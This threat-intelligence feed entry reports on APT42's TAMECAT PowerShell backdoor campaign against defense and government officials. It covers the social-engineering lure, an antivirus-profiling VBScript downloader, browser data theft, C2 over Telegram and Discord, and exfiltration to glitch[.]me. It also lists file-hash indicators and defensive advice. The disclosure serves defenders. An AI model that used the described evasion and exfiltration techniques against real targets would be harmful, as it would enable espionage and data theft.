The Israel National Digital Agency analyzed a cyber-espionage campaign using a new malicious tool called TAMECAT. This malware is a "backdoor," meaning it allows attackers to secretly control a computer, steal files, and watch what the user is doing.

Who is behind the attack?

The attack is attributed to APT42, a state-sponsored cyber-espionage group linked to Iran. They are known for conducting long-term surveillance operations rather than immediate financial theft.

The report indicates the primary targets were high-value senior defense and government officials. The attackers focused on specific individuals who likely possess sensitive national security or strategic information.

How was the attack carried out?

The attackers first used "social engineering," engaging in conversation with victims to build a fake friendship or professional relationship. Once trust was established, they convinced the victim to open a file. This file (a script) checked the victim's antivirus software and then downloaded the main malware (TAMECAT) from the internet using standard computer tools to avoid raising alarms.

What does the malware do?

Once inside, TAMECAT can take screenshots, steal information from web browsers like Chrome and Edge, and execute further commands sent by the attackers. It hides its communication by using popular, legitimate web services like Telegram and Glitch, making the traffic look normal to security systems.

What should organizations do to protect themselves?

Organizations should block the specific web domains mentioned in the report (such as glitch[.]me subdomains used by the attackers) and monitor for suspicious script activity on their networks. Crucially, high-profile staff should be trained to recognize social engineering attempts, especially from online contacts seeking to send files after a period of chatting.

Threats Feed|APT42|Last Updated 03/02/2026|AuthorCertfa Radar|Publish Date29/01/2026

APT42 Deploys Modular TAMECAT Backdoor Targeting Defense and Government Sectors

Actor Motivations: Espionage,Exfiltration
Attack Vectors: Backdoor,Downloader,Spyware,Pretexting,Spear Phishing
Attack Complexity: Medium
Threat Risk: High Impact/Low Probability

Threat Overview

APT42 utilizes TAMECAT, a modular PowerShell-based backdoor, to target high-value senior defense and government officials. Israel’s National Digital Agency reports that the group employs social engineering to gain initial access. The infection chain begins with a VBScript that profiles antivirus software via WMI to determine whether to deploy PowerShell or Command Shell downloaders. TAMECAT features sophisticated capabilities, including screen capture, Chrome data collection, and Microsoft Edge remote debugging. It leverages legitimate services like Telegram and Discord for Command and Control (C2). Data is encrypted via AES and exfiltrated to domains such as glitch[.]me, demonstrating APT42's focus on stealth and persistent espionage operations.

Reference and Credit: Pulsedive - January 2026

TAMECAT - Analysis of an Iranian PowerShell-Based Backdoor

Detected Targets

Type	Description	Confidence
Sector	Defense	Verified
Sector	Government Agencies and Services	Verified
Region	Israel	Verified

Extracted IOCs

081419a484bbf99f278ce636d445b9d8
d7bf138d1aa2b70d6204a2f3c3bc72a7
0ef4f7a8d7b1d34e10faa0bca1dcb76a518dd417
3fd06c930ddc4b1914151f69454c087a42413a24
5404e39f2f175a0fc993513ee52be3679a64c69c79e32caa656fbb7645965422
bd1f0fb085c486e97d82b6e8acb3977497c59c3ac79f973f96c395e7f0ca97f8

download

Tip: 6 related IOCs (0 IP, 0 domain, 0 URL, 0 email, 6 file hash) to this threat have been found.

Overlaps

APT42APT42: Iranian Cyber Espionage Campaign Targets Global NGO and Media Sectors

Source: Google Cloud - May 2024

Detection (two cases): 081419a484bbf99f278ce636d445b9d8, d7bf138d1aa2b70d6204a2f3c3bc72a7

Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.

FAQs

The TAMECAT Espionage Campaign

: The Israel National Digital Agency analyzed a cyber-espionage campaign using a new malicious tool called TAMECAT. This malware is a "backdoor," meaning it allows attackers to secretly control a computer, steal files, and watch what the user is doing.
: The attack is attributed to APT42, a state-sponsored cyber-espionage group linked to Iran. They are known for conducting long-term surveillance operations rather than immediate financial theft.
: The report indicates the primary targets were high-value senior defense and government officials. The attackers focused on specific individuals who likely possess sensitive national security or strategic information.
: The attackers first used "social engineering," engaging in conversation with victims to build a fake friendship or professional relationship. Once trust was established, they convinced the victim to open a file. This file (a script) checked the victim's antivirus software and then downloaded the main malware (TAMECAT) from the internet using standard computer tools to avoid raising alarms.
: Once inside, TAMECAT can take screenshots, steal information from web browsers like Chrome and Edge, and execute further commands sent by the attackers. It hides its communication by using popular, legitimate web services like Telegram and Glitch, making the traffic look normal to security systems.
: Organizations should block the specific web domains mentioned in the report (such as glitch[.]me subdomains used by the attackers) and monitor for suspicious script activity on their networks. Crucially, high-profile staff should be trained to recognize social engineering attempts, especially from online contacts seeking to send files after a period of chatting.

About Affiliation

APT42

Associate threats